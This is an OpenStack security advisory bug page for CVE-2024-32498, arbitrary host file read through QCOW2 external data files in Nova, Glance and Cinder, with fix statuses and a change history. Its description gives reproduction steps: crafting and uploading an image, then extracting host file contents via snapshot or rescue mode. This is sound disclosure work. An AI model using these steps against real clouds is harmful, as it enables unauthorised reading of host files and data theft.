[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
Cinder |
Fix Released
|
Critical
|
Brian Rosmaita | ||
Glance |
Fix Released
|
Critical
|
Dan Smith | ||
OpenStack Compute (nova) |
Fix Released
|
Critical
|
Sylvain Bauza | ||
OpenStack Security Advisory |
Fix Released
|
High
|
Jeremy Stanley | ||
Ubuntu Cloud Archive |
Fix Released
|
Undecided
|
Unassigned | ||
Antelope |
Fix Released
|
Undecided
|
Unassigned | ||
Bobcat |
Fix Released
|
Undecided
|
Unassigned | ||
Caracal |
Fix Released
|
Undecided
|
Unassigned | ||
Ussuri |
Fix Committed
|
Undecided
|
Unassigned | ||
Yoga |
Fix Released
|
Undecided
|
Unassigned |
Bug Description
OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.
Steps to Reproduce:
- Create a disk image: `qemu-img create -f qcow2 -o data_file=
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.
With the non-bootable instance there might be two ways to continue:
Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0
Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.
CVE References
Changed in cinder: | |
status: | New → In Progress |
importance: | Undecided → Critical |
assignee: | nobody → Brian Rosmaita (brian-rosmaita) |
Changed in glance: | |
status: | New → In Progress |
importance: | Undecided → Critical |
assignee: | nobody → Dan Smith (danms) |
Changed in nova: | |
status: | New → In Progress |
Changed in ossa: | |
status: | Incomplete → Confirmed |
importance: | Undecided → High |
assignee: | nobody → Jeremy Stanley (fungi) |
status: | Confirmed → Triaged |
Changed in ossa: | |
status: | Triaged → In Progress |
summary: |
- Arbitrary file access through QCOW2 external data file + Arbitrary file access through QCOW2 external data file (CVE-2024-32498) |
description: | updated |
Changed in nova: | |
importance: | Undecided → Critical |
assignee: | nobody → Sylvain Bauza (sylvain-bauza) |
summary: |
- Arbitrary file access through QCOW2 external data file (CVE-2024-32498) + [OSSA-2024-001] Arbitrary file access through QCOW2 external data file + (CVE-2024-32498) |
description: | updated |
information type: | Private Security → Public Security |
Changed in ossa: | |
status: | In Progress → Fix Released |
Changed in nova: | |
status: | In Progress → Fix Released |
Changed in cinder: | |
status: | In Progress → Fix Released |
Changed in glance: | |
status: | In Progress → Fix Released |
tags: | added: in-unmaintained-zed |
Changed in cloud-archive: | |
status: | Fix Released → Fix Committed |
Since this report concerns a possible security risk, an incomplete
security advisory task has been added while the core security
reviewers for the affected project or projects confirm the bug and
discuss the scope of any vulnerability along with potential
solutions.